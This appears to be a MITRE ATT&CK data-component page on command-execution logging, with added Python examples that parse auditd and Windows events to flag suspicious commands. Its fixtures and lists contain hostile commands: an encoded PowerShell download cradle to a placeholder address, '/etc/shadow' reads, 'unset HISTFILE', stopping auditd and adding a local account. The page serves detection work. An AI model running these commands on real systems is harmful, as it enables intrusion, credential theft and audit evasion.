Command Execution

Command Execution involves monitoring and capturing the execution of textual commands (including shell commands, cmdlets, and scripts) within an operating system or application. These commands may include arguments or parameters and are typically executed through interpreters such as cmd.exe, bash, zsh, PowerShell, or programmatic execution. Examples:

  • Windows Command Prompt
    • dir – Lists directory contents.
    • net user – Queries or manipulates user accounts.
    • tasklist – Lists running processes.
  • PowerShell
    • Get-Process – Retrieves processes running on a system.
    • Set-ExecutionPolicy – Changes PowerShell script execution policies.
    • Invoke-WebRequest – Downloads remote resources.
  • Linux Shell
    • ls – Lists files in a directory.
    • cat /etc/passwd – Reads the user accounts file.
    • curl http://malicious-site.com – Retrieves content from a malicious URL.
  • Container Environments
    • docker exec – Executes a command inside a running container.
    • kubectl exec – Runs commands in Kubernetes pods.
  • macOS Terminal
    • open – Opens files or URLs.
    • dscl . -list /Users – Lists all users on the system.
    • osascript -e – Executes AppleScript commands.

This data component can be collected through the following measures:

Enable Command Logging

  • Windows:
    • Enable PowerShell script block logging by creating the key HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging (it does not exist until the policy is set) and then running Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1, or set the same policy through Group Policy. Module logging (the neighbouring ModuleLogging key, EnableModuleLogging=1 with the modules to log, or *, listed under its ModuleNames subkey) produces the Event ID 4103 records referenced in the Log Sources table. Set-ExecutionPolicy Bypass is not part of this and should not be run for it: the execution policy is not a security boundary, and lowering it has nothing to do with logging.
    • Enable Windows Event Logging:
      • Event ID 4688 (Security log): process creation. The command line is only recorded when the "Include command line in process creation events" policy (Computer Configuration > Administrative Templates > System > Audit Process Creation) is enabled in addition to the Audit Process Creation subcategory; otherwise the CommandLine field is present but empty.
      • Event ID 4104 (Microsoft-Windows-PowerShell/Operational): PowerShell script block execution. The block is logged as the engine sees it, so an -EncodedCommand payload or a layer of string-built obfuscation appears decoded once it runs, which is what makes 4104 useful against obfuscated commands.
  • Linux/macOS:
    • Shell history logging in .bashrc or .zshrc (export HISTTIMEFORMAT="%d/%m/%y %T ", export PROMPT_COMMAND='history -a; history -w') adds per-user context, but it is not a security log: the file is written by a shell the user controls, non-interactive commands and scripts never reach it, and it is trivially disabled (unset HISTFILE, HISTCONTROL, HISTSIZE, or simply another shell), as several Log Sources entries below note. Treat it as supplementary.
    • Use audit frameworks (e.g., auditd) to log command executions at the kernel level, where the user cannot opt out. Example rule to log all execve syscalls: -a always,exit -F arch=b64 -S execve -k cmd_exec. Add the same rule with arch=b32 so 32-bit binaries are covered. On macOS the equivalent is the ex class in /etc/security/audit_control (OpenBSM, now deprecated) or an agent built on the Endpoint Security framework.
  • Containers:
    • Docker's --log-driver forwards container stdout/stderr, not the commands run through docker exec. Exec activity appears in the Docker daemon log and in docker events (exec_create and exec_start events carry the command), and in Kubernetes API-server audit logs as create requests on the pods/exec subresource, where the command is in the request URI. Commands started by a process already inside the container pass through neither API; for those, use auditd or eBPF on the node (see the ebpf:syscalls entry under Log Sources).
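The auditd rule above produces three records per execve (SYSCALL, EXECVE, PROCTITLE) joined by one audit serial, and any argument containing whitespace or quotes is written as bare hex rather than a quoted string, so the raw lines are not directly searchable. The following is an added example, not code from the ATT&CK page: it reassembles those records into command lines and screens them against a few of the patterns listed under Log Sources below (audit tampering, history tampering, credential file reads, HTTP uploads). The audit lines, the rule names and the function names are this example's own constructions.

```python
"""Reassemble auditd execve records into command lines and screen them.
Added example (not from the ATT&CK page); the audit lines below are constructed."""
import re
from collections import defaultdict

# Constructed sample: three execve events, each a SYSCALL/EXECVE/PROCTITLE triple
# sharing one serial.  Event 4521 has an argument containing spaces, which auditd
# writes as bare hex (no quotes); proctitle is always hex with NUL between argv items.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1700000000.101:4521): arch=c000003e syscall=59 success=yes exit=0 a0=55d0e8c2a6d0 a1=55d0e8c2a7e0 a2=55d0e8c2a900 a3=8 items=2 ppid=2200 pid=2231 auid=1000 uid=1000 gid=1000 euid=1000 tty=pts0 ses=3 comm="bash" exe="/usr/bin/bash" key="cmd_exec"
type=EXECVE msg=audit(1700000000.101:4521): argc=3 a0="bash" a1="-c" a2=756E736574204849535446494C453B20636174202F6574632F736861646F77
type=PROCTITLE msg=audit(1700000000.101:4521): proctitle=62617368002D6300756E736574204849535446494C453B20636174202F6574632F736861646F77
type=SYSCALL msg=audit(1700000000.202:4522): arch=c000003e syscall=59 success=yes exit=0 a0=5591a2b3c4d0 a1=5591a2b3c5e0 a2=5591a2b3c700 a3=8 items=2 ppid=2231 pid=2240 auid=1000 uid=0 gid=0 euid=0 tty=pts0 ses=3 comm="systemctl" exe="/usr/bin/systemctl" key="cmd_exec"
type=EXECVE msg=audit(1700000000.202:4522): argc=3 a0="systemctl" a1="stop" a2="auditd"
type=PROCTITLE msg=audit(1700000000.202:4522): proctitle=73797374656D63746C0073746F7000617564697464
type=SYSCALL msg=audit(1700000000.303:4523): arch=c000003e syscall=59 success=yes exit=0 a0=55aa11bb22c0 a1=55aa11bb23d0 a2=55aa11bb2500 a3=8 items=2 ppid=2200 pid=2250 auid=1000 uid=1000 gid=1000 euid=1000 tty=pts0 ses=3 comm="ls" exe="/usr/bin/ls" key="cmd_exec"
type=EXECVE msg=audit(1700000000.303:4523): argc=3 a0="ls" a1="-la" a2="/tmp"
type=PROCTITLE msg=audit(1700000000.303:4523): proctitle=6C73002D6C61002F746D70
"""

HEADER_RE = re.compile(r'^type=(?P<type>\w+) msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\): (?P<body>.*)$')
FIELD_RE = re.compile(r'(\w+(?:\[\d+\])?)=("(?:[^"\\]|\\.)*"|\S+)')
ARG_RE = re.compile(r'a(\d+)(?:\[(\d+)\])?')   # a2, or a2[0], a2[1], ... for long arguments

# Screening rules modelled on patterns listed under Log Sources; the names are this example's own.
RULES = [
    ('audit tampering', re.compile(r'\b(auditctl\b|systemctl\s+stop\s+auditd\b|service\s+auditd\s+stop\b|kill\s+-9\s+\S*auditd)')),
    ('history logging impaired', re.compile(r'\b(unset\s+HIST\w*|export\s+HIST\w*=|HISTFILE=/dev/null)')),
    ('credential file read', re.compile(r'\b(cat|grep|awk|less|head|tail)\b[^;|]*\s/etc/(shadow|passwd|sudoers)\b')),
    ('HTTP upload', re.compile(r'\b(curl\b[^;|]*(\s-X\s*POST\b|\s-d\s|\s--data\b|\s-T\s)|wget\b[^;|]*--post-data)')),
]


def decode_value(rtype, name, raw):
    """Strip quotes from plain values; hex-decode only the fields auditd actually encodes.
    SYSCALL a0-a3 are register values, never encoded strings, so they are left alone."""
    if raw.startswith('"'):
        return raw[1:-1]
    encoded = (rtype == 'EXECVE' and ARG_RE.fullmatch(name)) or name in ('proctitle', 'comm', 'exe', 'cwd', 'key')
    if encoded and len(raw) % 2 == 0 and re.fullmatch(r'[0-9A-Fa-f]+', raw):
        return bytes.fromhex(raw).decode('utf-8', 'replace')
    return raw


def parse_events(text):
    """Group records by audit serial; collect execve argv segments separately."""
    events = defaultdict(lambda: {'records': {}, 'args': defaultdict(dict)})
    for line in text.splitlines():
        m = HEADER_RE.match(line.strip())
        if not m:
            continue
        ev = events[m['serial']]
        ev['ts'] = m['ts']
        fields = {k: decode_value(m['type'], k, v) for k, v in FIELD_RE.findall(m['body'])}
        if m['type'] == 'EXECVE':
            for k, v in fields.items():
                am = ARG_RE.fullmatch(k)
                if am:
                    ev['args'][int(am.group(1))][int(am.group(2) or 0)] = v
        else:
            ev['records'][m['type']] = fields
    return events


def triage(text):
    """One summary per execve event, in serial order, with the names of matching rules."""
    out = []
    for serial, ev in sorted(parse_events(text).items(), key=lambda kv: int(kv[0])):
        argv = [''.join(segs[i] for i in sorted(segs)) for _, segs in sorted(ev['args'].items())]
        cmdline = ' '.join(argv)
        sc = ev['records'].get('SYSCALL', {})
        out.append({
            'serial': serial, 'ts': ev['ts'],
            # auid is the login user; uid is the effective user, so auid=1000 uid=0 means sudo/su
            'auid': sc.get('auid'), 'uid': sc.get('uid'), 'exe': sc.get('exe'),
            'cmdline': cmdline,
            # proctitle is /proc/<pid>/cmdline at execve time; NULs separate argv items
            'proctitle': ev['records'].get('PROCTITLE', {}).get('proctitle', '').replace('\x00', ' '),
            'hits': [name for name, rx in RULES if rx.search(cmdline)],
        })
    return out


if __name__ == '__main__':
    for e in triage(SAMPLE_AUDIT_LOG):
        print(f"{e['serial']} auid={e['auid']} uid={e['uid']} {e['cmdline']!r} -> {e['hits']}")
```

Two details matter in practice: the screening runs on the reassembled argv, so a bash -c "…" wrapper does not hide the inner commands from the credential and history rules, and the auid/uid pair shows that the auditd stop in the sample was issued by login user 1000 acting as root.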

Integrate with Centralized Logging

  • Collect logs using a SIEM (e.g., Splunk) or cloud-based log aggregation tools like AWS CloudWatch or Azure Monitor. Example Splunk search for Windows Event 4688 (the Splunk add-on for Windows names the field EventCode; adjust the field name to your ingestion path):
    index=windows EventCode=4688 CommandLine=*
    CommandLine=* matches nothing from hosts where "Include command line in process creation events" is not enabled; searching for 4688 events with an empty CommandLine is a quick way to find those hosts.

Use Endpoint Detection and Response (EDR) Tools

  • Monitor command executions via EDR solutions. EDR agents record process creation with the full command line and parent lineage independently of the OS audit policy, so they cover hosts where 4688 command-line auditing, Sysmon or auditd are not configured, though their retention and search interface are the vendor's, not the SIEM's.

Deploy Sysmon for Advanced Logging (Windows)

  • Use Sysmon Event ID 1 (ProcessCreate) to log process creation with command-line arguments, the parent process and its command line, file hashes and the user context. Unlike 4688 it records the command line without extra audit policy, but only for processes the Sysmon configuration does not exclude.

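To show what the 4688 and Sysmon data above looks like once it has been collected, and why the command-line audit policy matters, here is an added example that is not code from the ATT&CK page or from Microsoft. It reads Security 4688 and Sysmon Event ID 1 records in the Windows event XML schema (the same records a SIEM forwarder ships), normalises the differently named fields, decodes a PowerShell -EncodedCommand argument, and flags a 4688 event whose CommandLine is empty as a collection gap rather than an attack. The three events, the host and user names, the payload and its URL are constructed; the flag names and helper functions are this example's own.

```python
"""Extract and screen command lines from Windows process-creation events
(Security 4688 and Sysmon Event ID 1).  Added example; all events are constructed."""
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {'e': 'http://schemas.microsoft.com/win/2004/08/events/event'}

# Constructed fixture: -EncodedCommand takes the script as UTF-16LE, base64-encoded.
# 192.0.2.10 is a documentation address, not a real host.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode('utf-16le')).decode()


def make_event(event_id, channel, provider, data):
    """Render an event in the Windows event XML schema (fixture builder for this example)."""
    rows = ''.join(f'<Data Name="{k}">{escape(v)}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><Provider Name="{provider}"/>'
            f'<EventID>{event_id}</EventID><Channel>{channel}</Channel>'
            f'<Computer>WS01</Computer></System><EventData>{rows}</EventData></Event>')


SAMPLE_EVENTS = [
    # 4688 from a host where "Include command line in process creation events" is off:
    # the CommandLine field is present but empty, so the event says nothing about arguments.
    make_event(4688, 'Security', 'Microsoft-Windows-Security-Auditing', {
        'SubjectUserName': 'alice', 'NewProcessName': r'C:\Windows\System32\whoami.exe',
        'CommandLine': '', 'ParentProcessName': r'C:\Windows\System32\cmd.exe'}),
    make_event(4688, 'Security', 'Microsoft-Windows-Security-Auditing', {
        'SubjectUserName': 'alice',
        'NewProcessName': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
        'CommandLine': f'powershell.exe -NoP -W Hidden -enc {ENCODED}',
        'ParentProcessName': r'C:\Windows\System32\cmd.exe'}),
    make_event(1, 'Microsoft-Windows-Sysmon/Operational', 'Microsoft-Windows-Sysmon', {
        'User': r'WS01\alice', 'Image': r'C:\Windows\System32\net1.exe',
        'CommandLine': r'C:\Windows\system32\net1 user backup_svc Summer2024! /add',
        'ParentImage': r'C:\Windows\System32\net.exe',
        'ParentCommandLine': 'net user backup_svc Summer2024! /add'}),
]

# Field names differ between Security 4688 and Sysmon Event ID 1; normalise both.
FIELD_MAP = {
    ('Security', 4688): {'user': 'SubjectUserName', 'image': 'NewProcessName',
                         'parent': 'ParentProcessName', 'cmdline': 'CommandLine'},
    ('Microsoft-Windows-Sysmon/Operational', 1): {'user': 'User', 'image': 'Image',
                                                  'parent': 'ParentImage', 'cmdline': 'CommandLine'},
}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the usual ones.
ENC_RE = re.compile(r'(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})', re.I)
CRADLE_RE = re.compile(r'DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|\bIEX\b|Invoke-Expression', re.I)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent or not valid base64/UTF-16LE."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode('utf-16le')
    except (ValueError, UnicodeDecodeError):
        return None


def extract(xml_text):
    """Normalise one event and attach screening flags."""
    root = ET.fromstring(xml_text)
    sysnode = root.find('e:System', NS)
    event_id = int(sysnode.findtext('e:EventID', namespaces=NS))
    channel = sysnode.findtext('e:Channel', namespaces=NS)
    if (channel, event_id) not in FIELD_MAP:
        raise ValueError(f'unsupported event {channel}:{event_id}')
    data = {d.get('Name'): (d.text or '') for d in root.find('e:EventData', NS)}
    rec = {'source': f'{channel}:{event_id}',
           **{k: data.get(v, '') for k, v in FIELD_MAP[(channel, event_id)].items()}}
    rec['decoded'] = decode_encoded_command(rec['cmdline'])
    flags = []
    if event_id == 4688 and not rec['cmdline']:
        flags.append('no_command_line')       # collection gap: fix the audit policy on this host
    if rec['decoded'] is not None:
        flags.append('encoded_powershell')
    if re.search(r'-w(?:indowstyle)?\s+hidden', rec['cmdline'], re.I):
        flags.append('hidden_window')
    if CRADLE_RE.search(rec['cmdline']) or (rec['decoded'] and CRADLE_RE.search(rec['decoded'])):
        flags.append('download_cradle')       # only visible because the payload was decoded
    if re.search(r'\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b', rec['cmdline'], re.I):
        flags.append('local_account_creation')
    rec['flags'] = flags
    return rec


def triage(events):
    return [extract(e) for e in events]


if __name__ == '__main__':
    for r in triage(SAMPLE_EVENTS):
        print(r['source'], r['user'], r['flags'], r['decoded'] or r['cmdline'])
```

The download cradle in the second event is invisible to a plain substring search over CommandLine; it is only found after decoding, which is also why Event ID 4104 (which logs the decoded block) is worth collecting alongside 4688.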
ID: DC0064
Domains: ICS, Mobile, Enterprise
Version: 2.0
Created: 20 October 2021
Last Modified: 21 October 2025

Log Sources

Name Channel
auditd:CONFIG_CHANGE udev rule reload or trigger command executed
auditd:EXECVE Use of mv or cp to rename files with '.' prefix
auditd:EXECVE execve: Execution of update-ca-certificates or trust anchor modification commands
auditd:EXECVE gcore, gdb, strings, hexdump execution
auditd:EXECVE Execution of auditctl, systemctl stop auditd, or kill -9 auditd
auditd:EXECVE execution of systemctl with subcommands start, stop, enable, disable
auditd:EXECVE Execution of GUI-related binaries with suppressed window/display flags
auditd:EXECVE curl -X POST, wget --post-data
auditd:EXECVE command line arguments containing lsblk, fdisk, parted
auditd:EXECVE exec: Execution of dd, efibootmgr, or flashrom modifying firmware/boot partitions
auditd:EXECVE curl -d, wget --post-data
auditd:EXECVE grep/cat/awk on files with password fields
auditd:EXECVE git push, curl -X POST
auditd:EXECVE Execution of gsettings set org.gnome.login-screen disable-user-list true
auditd:EXECVE execution of setfattr or getfattr commands
auditd:EXECVE Process execution of update-ca-certificates or openssl with suspicious arguments
auditd:EXECVE Execution of chattr to set +i or +a attributes
auditd:EXECVE curl or wget with POST/PUT options
auditd:EXECVE curl -T, rclone copy
auditd:PROCTITLE proctitle contains chmod, chown, setfacl, or attr commands with suspicious parameters
auditd:PROCTITLE proctitle contains chmod, chown, chgrp, setfacl, or attr with suspicious parameters (777, 755, +x, -R)
auditd:PROCTITLE process title records containing discovery command sequences and environmental assessment patterns
auditd:PROCTITLE command-line execution patterns for system discovery utilities (uname, hostname, ifconfig, netstat, lsof, ps, mount)
auditd:SYSCALL execution of realmd, samba-tool, or ldapmodify with user-related arguments
auditd:SYSCALL Execution of script interpreters by systemd timer (ExecStart)
auditd:SYSCALL execve: Commands like systemctl stop, service stop, or kill -9
auditd:SYSCALL execve calls to locale, timedatectl, or cat /etc/timezone
auditd:SYSCALL sleep function usage or loops (nanosleep, usleep) in scripts
auditd:SYSCALL connect, execve, write
auditd:SYSCALL execve call including 'nohup' or trailing '&'
auditd:SYSCALL None
auditd:SYSCALL execve: Commands executed within an SSH session where no matching logon/authentication event exists
auditd:SYSCALL chmod, execve
auditd:SYSCALL execve: iptables, nft, firewall-cmd modifications
auditd:SYSCALL execve: Invocation of scp, rsync, curl, or sftp
auditd:SYSCALL execve calls modifying local mail filter configuration files
auditd:SYSCALL execve: process_name IN ("virsh", "VBoxManage", "qemu-img") AND command IN ("list", "info")
auditd:SYSCALL execve: service stop syslog, systemctl stop rsyslog, kill -9 syslog
auditd:SYSCALL execve: openssl pkcs12, certutil, keytool
auditd:SYSCALL execve: Process in container namespace executes curl|wget|bash|sh|python|nc with outbound args
auditd:SYSCALL execution of systemctl or service with enable/start parameters
auditd:SYSCALL execve: Execution of cat, less, grep, journalctl targeting log directories (/var/log/)
auditd:SYSCALL execve: Execution of python, perl, or custom binaries invoking compression libraries
auditd:SYSCALL execve, USER_CMD
auditd:SYSCALL bash/zsh of base64, tar, gzip, or openssl immediately after file write
auditd:SYSCALL execve: Processes executing sendmail/postfix with forged headers
auditd:SYSCALL execve: Execution of tar, gzip, bzip2, xz, zip, or openssl with compression/encryption arguments
auditd:SYSCALL promiscuous mode transitions (ioctl or ifconfig)
auditd:SYSCALL chattr, rm, shred, dd run on recovery directories or partitions
auditd:SYSCALL execve: Execution of curl or wget writing files to /tmp/* followed by chmod or execution
auditd:SYSCALL execve: Execution of downgraded interpreters such as python2 or forced fallback commands
auditd:SYSCALL Command line arguments including SPApplicationsDataType
auditd:SYSCALL Execution of spoofing tools (e.g., hping3, nping, scapy) sending UDP packets to known amplifier ports
auditd:SYSCALL execution of tools like cat, grep, or awk on credential files
auditd:SYSCALL execve of curl, rsync, wget with internal knowledge base or IPs
auditd:SYSCALL execve: Execution of systemctl, loginctl, or systemd-inhibit commands related to sleep/hibernate
auditd:SYSCALL Execution of xev, xdotool, or input activity emulators
auditd:SYSCALL execve: Execution of interpreters creating archive-like outputs without calling tar/gzip
auditd:SYSCALL Execution of insmod, modprobe, or rmmod commands by non-standard users or outside expected timeframes
auditd:SYSCALL execve syscalls for discovery commands (uname, hostname, id, whoami, ps, netstat, mount) with command-line parameter analysis
auditd:SYSCALL execve: Execution of curl, wget, or custom scripts accessing financial endpoints
auditd:SYSCALL execve: Execution of tar, gzip, bzip2, or openssl with output redirection
auditd:SYSCALL execve=/sbin/shutdown or /sbin/reboot
auditd:SYSCALL execve calls modifying HISTFILE or HISTCONTROL via unset/export
auditd:SYSCALL execve calls to /usr/bin/locale or shell execution of $LANG
auditd:SYSCALL execution of systemctl or service with enable/start/modify
auditd:SYSCALL execve: Execution of lsmod, modinfo, or cat /proc/modules
auditd:USER_CMD USER_CMD
AWS:CloudTrail InvokeFunction
AWS:CloudTrail eventName: RunInstances, CreateUser, PutRolePolicy, InvokeCommand
AWS:CloudTrail SSM RunCommand
AWS:CloudTrail GetLogEvents: High frequency log exports from CloudWatch or equivalent services
AWS:CloudTrail command-line execution invoking credential enumeration
AWS:CloudTrail ssm:GetCommandInvocation
AWS:CloudTrail SendCommand, StartSession, ExecuteCommand: Unexpected AWS Systems Manager command execution targeting EC2 instances
azure:activity Intune PowerShell Scripts
azure:signinLogs OperationName=SetDomainAuthentication OR Update-MsolFederatedDomain
Command None
docker:api docker logs access or container inspect commands from non-administrative users
docker:daemon docker exec or docker run with unexpected command/entrypoint
docker:events container exec rm|container stop --force
ebpf:syscalls useradd or /etc/passwd modified inside container
EDR:AMSI None
EDR:cli Command Line Telemetry
esxi:hostd command execution
esxi:hostd /var/log/hostd.log
esxi:hostd modification of config files or shell command execution
esxi:hostd shell access or job registration
esxi:hostd logline inspection
esxi:hostd esxcli network firewall set commands
esxi:hostd event stream
esxi:hostd scp/ssh used to move file across hosts
esxi:hostd None
esxi:hostd esxcli system syslog config set or reload
esxi:hostd command log
esxi:hostd Execution of '/bin/vmx' or modifications to '/etc/rc.local.d/local.sh'
esxi:hostd Command Execution
esxi:hostd remote CLI + vim-cmd logging
esxi:hostd execution + payload hints
esxi:shell snapshot create/copy, esxcli
esxi:shell interactive shell
esxi:shell /var/log/shell.log
esxi:shell invoked remote scripts (esxcli)
esxi:shell base64 or gzip use within shell session
esxi:shell scripts or binaries with misleading names
esxi:shell /var/log/shell.log entries containing "esxcli system clock get"
esxi:shell None
esxi:shell command IN ("esxcli vm process list", "vim-cmd vmsvc/getallvms")
esxi:shell openssl|tar|dd
esxi:shell Execution of cat, tail, grep targeting /var/log/vmkernel.log or /var/log/hostd.log
esxi:shell CLI usage logs
esxi:shell Command execution trace
esxi:shell shell command execution for chmod, chown, or file permission modification on VMFS or system files
esxi:shell esxcli system syslog config set --loghost='' or stopping hostd service
esxi:shell Shell Access/Command Execution
esxi:shell esxcli software vib list
esxi:shell /root/.ash_history
esxi:shell mv, rename, or chmod commands moving VM files into hidden directories
esxi:shell `esxcli software vib install` with `--force` or `--no-sig-check` from shell history or `shell.log`
esxi:shell CLI session activity
esxi:shell esxcli system shutdown or reboot invoked
esxi:shell shell command execution for system discovery (vim-cmd, esxcli, vmware-cmd) targeting VM inventory and host configuration
esxi:shell unset HISTFILE or HISTFILESIZE modifications
esxi:syslog boot logs
esxi:vmkernel /var/log/vmkernel.log
esxi:vmkernel DCUI shell start, BusyBox activity
esxi:vmkernel esxcli system account add
esxi:vmkernel Unexpected restarts of management agents or shell access
esxi:vmkernel esxcli, vim-cmd invocation
esxi:vobd shell session start
esxi:vpxd vCenter Management
fs:fsusage file system activity monitor
fs:fsusage access to BPF devices or interface IOCTLs
gcp:audit None
gcp:audit methodName: setIamPolicy, startInstance, createServiceAccount
kubernetes:audit Shell process (e.g., /bin/sh, /bin/bash) spawned in a container without an interactive session attached (i.e., automation anomaly)
kubernetes:audit process execution involving curl, grep, or awk on secrets
linux:syslog None
linux:cli command logging
linux:cli Shell history logs
linux:cli Terminal Command History
linux:cli /home/*/.bash_history
linux:osquery Command-line includes base64 -d or openssl enc -d
linux:osquery process_events.command_line
linux:shell Manual invocation of software enumeration commands via interactive shell
linux:syslog /var/log/syslog or journalctl
linux:syslog Suspicious script or command execution targeting browser folders
linux:syslog Unusual outbound transfers from CLI tools like base64, gzip, or netcat
linux:syslog sudo chage|grep pam_pwquality|cat /etc/login.defs
linux:syslog sudo execution of ffmpeg/gst-launch/v4l2-ctl by non-standard user
linux:syslog sshd logs
linux:syslog CLI access to 'show running-config', 'show password', or 'cat config.txt'
linux:syslog Sudo or root escalation followed by filesystem mount commands
linux:syslog nslcd or winbind logs
m365:defender Activity Log: Command Invocation
m365:exchange Cmdlet: Get-GlobalAddressList, Get-Recipient
m365:exchange Get-RoleGroup, Get-DistributionGroup
m365:messagetrace Inbound email triggers execution of mailbox-stored custom form
m365:messagetrace Inbound email matches crafted rule trigger pattern tied to persistence logic
m365:messagetrace Inbound email triggering Outlook to auto-access folder tied to malicious Home Page
m365:office Startup execution includes non-default component
m365:office Execution of unsigned macro from template
m365:unified Automated forwarding or file sync initiated by a logic app
m365:unified Search-Mailbox, Get-MessageTrace, eDiscovery requests
m365:unified Set-Mailbox, New-InboxRule
m365:unified Set-Mailbox, Set-MailboxPolicy, Set-TrustedLocation
macos:osquery Interpreter exec with suspicious arguments as above
macos:osquery launchd + process_events
macos:syslog system.log
macos:syslog /var/log/system.log
macos:unifiedlog dsconfigad or dscl with create or append options for AD-bound users
macos:unifiedlog launchctl unload, kill, or pkill commands affecting daemons or background services
macos:unifiedlog execution of security-agent detection or enumeration commands
macos:unifiedlog log stream --predicate
macos:unifiedlog Execution of chflags hidden or SetFile -a V
macos:unifiedlog log stream
macos:unifiedlog defaults read -g AppleLocale, systemsetup -gettimezone
macos:unifiedlog profiles install -type=configuration
macos:unifiedlog log stream --predicate 'eventMessage contains "loginwindow" or "pfctl"'
macos:unifiedlog exec or sudo usage with NOPASSWD context or echo modifying sudoers
macos:unifiedlog Execution of /usr/bin/security add-trusted-cert or keychain modifications to System.keychain
macos:unifiedlog nohup, disown, or osascript execution patterns
macos:unifiedlog Execution of 'profiles install -type=configuration'
macos:unifiedlog subsystem:com.apple.Terminal
macos:unifiedlog base64 or curl processes chained within short execution window
macos:unifiedlog exec: Invocation of /usr/bin/defaults write or /usr/bin/plutil modifying plist keys
macos:unifiedlog chmod command with arguments including '+s', 'u+s', or numeric values 4000–6777
macos:unifiedlog command includes dscl . delete or sysadminctl --deleteUser
macos:unifiedlog DS daemon log entries
macos:unifiedlog diskutil eraseDisk / asr restore with destructive flags
macos:unifiedlog pfctl -d, socketfilterfw --setglobalstate off, or modifications to com.apple.alf
macos:unifiedlog pwpolicy|PasswordPolicy
macos:unifiedlog Command line contains smbutil view //, mount_smbfs //
macos:unifiedlog log messages related to disk enumeration context or Terminal session
macos:unifiedlog defaults write com.apple.system.logging or logd manipulation
macos:unifiedlog process calling security find-certificate, export, or import
macos:unifiedlog Execution of log show, fs_usage, or cat targeting system.log
macos:unifiedlog execution of launchctl load/unload/start commands
macos:unifiedlog base64 -d or osascript invoked on staged file
macos:unifiedlog diskutil partitionDisk or eraseVolume with partition scheme modifications
macos:unifiedlog grep/cat on files matching credential patterns
macos:unifiedlog diskutil eraseDisk/zeroDisk or asr restore with destructive flags
macos:unifiedlog spctl --master-disable, csrutil disable, or defaults write to disable Gatekeeper
macos:unifiedlog process: at, job runner
macos:unifiedlog Execution of dscl . create with IsHidden=1
macos:unifiedlog log stream --predicate 'processImagePath contains "zip" OR "base64"'
macos:unifiedlog xattr utility execution with -w or -p flags
macos:unifiedlog execution of 'security', 'cat', or 'grep' commands accessing credential storage
macos:unifiedlog launchctl load or boot-time plist registration
macos:unifiedlog dscl -create
macos:unifiedlog kextload execution from Terminal or suspicious paths
macos:unifiedlog xattr -d com.apple.quarantine or similar removal commands
macos:unifiedlog Security framework operations including keychain access, cryptographic operations, and certificate validation
macos:unifiedlog None
macos:unifiedlog Execution of chflags hidden or setfile -a V
macos:unifiedlog process:spawn, process:exec
macos:unifiedlog csrutil disable
macos:unifiedlog log show --predicate 'process == '
macos:unifiedlog Execution of launchctl with setenv or bootout targeting TCC.db or AppleScript under Finder context
macos:unifiedlog command execution triggered by emond (e.g., shell, curl, python)
macos:unifiedlog Set or unset HIST* variables in shell environment
macos:unifiedlog defaults read -g AppleLocale or systemsetup -gettimezone
macos:unifiedlog launchctl load/unload or plist file modification
macos:unifiedlog dscl . -create
macos:unifiedlog Execution of commands like `ls -l@`, `xattr -l`, or custom tools interacting with resource forks
networkdevice:cli CLI command
networkdevice:cli Policy Update
networkdevice:cli ip ssh pubkey-chain
networkdevice:cli erase flash:, erase startup-config, format disk
networkdevice:cli CLI command logs
networkdevice:cli cmd: cmd=show clock detail
networkdevice:cli Execution of commands to load, copy, or replace system images (e.g., 'copy tftp flash', 'boot system')
networkdevice:cli None
networkdevice:cli Execution of commands like 'show running-config', 'copy running-config', or 'export config'
networkdevice:cli Execution of CLI commands altering crypto parameters (e.g., 'crypto key generate rsa modulus 512')
networkdevice:cli format flash:, format disk, reformat commands
networkdevice:cli erase flash:, erase nvram:, format disk
networkdevice:cli command logs
networkdevice:cli command logging
networkdevice:cli Interface commands
networkdevice:cli Execution of privileged commands such as 'copy tftp flash', 'boot system', or 'debug memory'
networkdevice:cli Execution of commands disabling crypto hardware acceleration (e.g., 'no crypto engine enable')
networkdevice:cli shell command
networkdevice:cli Commands like 'no logging' or equivalents that disable session history
networkdevice:cli Execution of commands such as 'copy tftp flash', 'boot system', 'reload'
networkdevice:config PKI export or certificate manipulation commands
networkdevice:config Configuration changes referencing 'boot system tftp' or modification of startup-config pointing to external TFTP servers
networkdevice:Firewall Audit trail or CLI/API access indicating commands like no access-list, delete rule-set, clear config
networkdevice:syslog Command Audit / Configuration Change
networkdevice:syslog eventlog
networkdevice:syslog command_exec
networkdevice:syslog command-exec: CLI commands containing "show clock", "show clock detail", "show timezone" executed by suspicious user/source
networkdevice:syslog cmd='show aaa*' OR 'show running-config | include password|aaa' OR 'show aaa common-criteria policy all'
networkdevice:syslog CLI command audit
networkdevice:syslog system boot logs
networkdevice:syslog exec command='monitor capture'
networkdevice:syslog no logging buffered, no aaa new-model, disable firewall
networkdevice:syslog interactive shell logging
networkdevice:syslog command sequence: erase → format → reload
networkdevice:syslog CLI Command Logging
networkdevice:syslog CLI Command Audit
networkdevice:syslog command audit
networkdevice:syslog Privilege-level command execution
networkdevice:syslog Detected CLI command to export key material
networkdevice:syslog reload command issued
networkdevice:syslog syslog facility LOCAL7 or trap messages
saas:PRMetadata Commit message or branch name contains encoded strings or payload indicators
vpxd.log VM inventory queries and configuration enumeration through vCenter API calls
WinEventLog:Microsoft-Office-Alerts Unexpected DLL or component loaded at Office startup
WinEventLog:Microsoft-Office-Alerts Office application warning or alert on macro execution from template
WinEventLog:Microsoft-Office/OutlookAddinMonitor Outlook loading add-in via unexpected load path or non-default profile context
WinEventLog:PowerShell Get-ADTrust|GetAllTrustRelationships
WinEventLog:PowerShell EventCode=4104
WinEventLog:PowerShell Execution of Microsoft script to enumerate custom forms in Outlook mailbox
